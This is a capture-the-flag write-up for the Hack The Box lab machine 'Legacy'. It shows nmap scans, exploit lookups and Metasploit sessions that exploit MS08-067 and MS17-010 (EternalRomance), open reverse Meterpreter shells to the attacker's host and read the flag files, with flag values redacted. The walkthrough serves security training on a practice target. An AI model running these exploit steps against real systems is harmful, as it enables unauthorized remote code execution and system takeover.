Legacy
Contents
Ports scan
root@kali:~# nmap -A -T4 -v legacy Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-13 22:48 EST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 22:48 Completed NSE at 22:48, 0.00s elapsed Initiating NSE at 22:48 Completed NSE at 22:48, 0.00s elapsed Initiating NSE at 22:48 Completed NSE at 22:48, 0.00s elapsed Initiating Ping Scan at 22:48 Scanning legacy (10.10.10.4) [4 ports] Completed Ping Scan at 22:48, 0.09s elapsed (1 total hosts) Initiating SYN Stealth Scan at 22:48 Scanning legacy (10.10.10.4) [1000 ports] Discovered open port 445/tcp on 10.10.10.4 Discovered open port 139/tcp on 10.10.10.4 Completed SYN Stealth Scan at 22:48, 4.70s elapsed (1000 total ports) Initiating Service scan at 22:48 Scanning 2 services on legacy (10.10.10.4) Completed Service scan at 22:49, 6.19s elapsed (2 services on 1 host) Initiating OS detection (try #1) against legacy (10.10.10.4) Retrying OS detection (try #2) against legacy (10.10.10.4) Initiating Traceroute at 22:49 Completed Traceroute at 22:49, 0.09s elapsed Initiating Parallel DNS resolution of 2 hosts. at 22:49 Completed Parallel DNS resolution of 2 hosts. at 22:49, 0.24s elapsed NSE: Script scanning 10.10.10.4. Initiating NSE at 22:49 Completed NSE at 22:49, 50.83s elapsed Initiating NSE at 22:49 Completed NSE at 22:49, 0.00s elapsed Initiating NSE at 22:49 Completed NSE at 22:49, 0.00s elapsed Nmap scan report for legacy (10.10.10.4) Host is up (0.044s latency). rDNS record for 10.10.10.4: legacy.htb Not shown: 997 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Device type: general purpose|specialized Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (92%), General Dynamics embedded (87%) OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2 Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (92%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 (92%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP Professional SP2 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results: |_clock-skew: mean: -4h00m01s, deviation: 1h24m50s, median: -5h00m01s | nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:83:b6 (VMware) | Names: | LEGACY<00> Flags: <unique><active> | HTB<00> Flags: <group><active> | LEGACY<20> Flags: <unique><active> | HTB<1e> Flags: <group><active> | HTB<1d> Flags: <unique><active> |_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2019-11-14T02:49:04+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1 86.68 ms 10.10.14.1 2 43.89 ms legacy.htb (10.10.10.4)
NSE: Script Post-scanning. Initiating NSE at 22:49 Completed NSE at 22:49, 0.00s elapsed Initiating NSE at 22:49 Completed NSE at 22:49, 0.00s elapsed Initiating NSE at 22:49 Completed NSE at 22:49, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 66.49 seconds Raw packets sent: 2070 (94.476KB) | Rcvd: 42 (2.508KB)
Vulnerabilities scan
root@nmapgit:~# nmap -p139,445 --script vuln legacy Starting Nmap 7.80SVN ( https://nmap.org ) at 2019-11-14 04:03 UTC Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for legacy (10.10.10.4) Host is up (0.045s latency).
PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds
Host script results: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 48.97 seconds
Nmap find 2 vulnerabilities on this host.
MS08-067
searchexploit results
root@kali:~/HTB/Machines/Legacy# searchsploit MS08-067
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft Windows - 'NetAPI32.dll' Cod | exploits/windows/remote/40279.py
Microsoft Windows Server - Code Execut | exploits/windows/dos/6824.txt
Microsoft Windows Server - Code Execut | exploits/windows/remote/7104.c
Microsoft Windows Server - Service Rel | exploits/windows/remote/16362.rb
Microsoft Windows Server - Universal C | exploits/windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - C | exploits/windows/remote/7132.py
--------------------------------------- ----------------------------------------
Shellcodes: No Result
-------------------------------- -----------------------------------------------
Paper Title | Path
| (/usr/share/exploitdb-papers/)
-------------------------------- -----------------------------------------------
How Conficker makes use of MS08 | docs/english/12934-how-conficker-makes-use-of-
-------------------------------- -----------------------------------------------
Metasploit
root@kali:~/HTB/Machines/Legacy# msfconsole msf5 > search MS08-067 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption msf5 > use exploit/windows/smb/ms08_067_netapi msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4 RHOSTS => 10.10.10.4 msf5 exploit(windows/smb/ms08_067_netapi) > check [+] 10.10.10.4:445 - The target is vulnerable. msf5 exploit(windows/smb/ms08_067_netapi) > exploit [*] Started reverse TCP handler on 10.10.14.34:4444 [*] 10.10.10.4:445 - Automatically detecting the target... [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 10.10.10.4:445 - Attempting to trigger the vulnerability... [*] Sending stage (180291 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.10.10.4:1028) at 2019-11-13 23:44:10 -0500
User flag
meterpreter > pwd C:\WINDOWS\system32 meterpreter > cd .. cmeterpreter > cd .. meterpreter > cd Documents\ and\ Settings meterpreter > dir Listing: C:\Documents and Settings ================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Administrator 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 All Users 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Default User 40777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService 40777/rwxrwxrwx 0 dir 2017-03-16 01:32:42 -0400 NetworkService 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 john meterpreter > cd john meterpreter > cd Desktop meterpreter > cat user.txt <USER FLAG>
Root flag
meterpreter > cd .. meterpreter > cd .. meterpreter > cd Administrator meterpreter > cd Desktop meterpreter > cat root.txt
Check for other vulnerabilities
meterpreter > bg [*] Backgrounding session 1... msf5 exploit(windows/smb/ms08_067_netapi) > use multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf5 post(multi/recon/local_exploit_suggester) > set SHOWDESCRIPTION true SHOWDESCRIPTION => true msf5 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.4 - Collecting local exploits for x86/windows... [*] 10.10.10.4 - 29 exploit checks are being tried... [+] 10.10.10.4 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows. [+] 10.10.10.4 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits. [+] 10.10.10.4 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64. [+] 10.10.10.4 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process. [+] 10.10.10.4 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores. [+] 10.10.10.4 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token. [+] 10.10.10.4 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. This module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string. [+] 10.10.10.4 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1. [*] Post module execution completed
ms17-010
searchsploit results
root@kali:~/HTB/Machines/Legacy# searchsploit ms17-010
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft Windows - 'EternalRomance'/' | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Ex | exploits/windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'Eternal | exploits/windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) | exploits/windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) | exploits/windows_x86-64/remote/41987.py
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Metasploit
root@kali:~/HTB/Machines/Legacy# msfconsole msf5 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection 2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization 3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution msf5 > use exploit/windows/smb/ms17_010_psexec msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4 RHOSTS => 10.10.10.4 msf5 exploit(windows/smb/ms17_010_psexec) > check [+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 [+] 10.10.10.4:445 - The target is vulnerable. msf5 exploit(windows/smb/ms17_010_psexec) > exploit [*] Started reverse TCP handler on 10.10.14.34:4444 [*] 10.10.10.4:445 - Target OS: Windows 5.1 [*] 10.10.10.4:445 - Filling barrel with fish... done [*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ----------------> [*] 10.10.10.4:445 - [*] Preparing dynamite... [*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom! [*] 10.10.10.4:445 - [+] Successfully Leaked Transaction! [*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel [*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ----------------> [*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x8232c760 [*] 10.10.10.4:445 - Built a write-what-where primitive... [+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained! [*] 10.10.10.4:445 - Selecting native target [*] 10.10.10.4:445 - Uploading payload... iKpAkaEE.exe [*] Sending stage (180291 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.10.10.4:1029) at 2019-11-14 00:10:37 -0500 [*] 10.10.10.4:445 - Created \iKpAkaEE.exe... [+] 10.10.10.4:445 - Service started successfully... [*] Sending stage (180291 bytes) to 10.10.10.4 [*] 10.10.10.4:445 - Deleting \iKpAkaEE.exe... meterpreter > pwd C:\Documents and Settings\Administrator\Desktop meterpreter > cat root.txt <ROOT FLAG>
References
Daniel Simao 22:42, 13 November 2019 (EST)
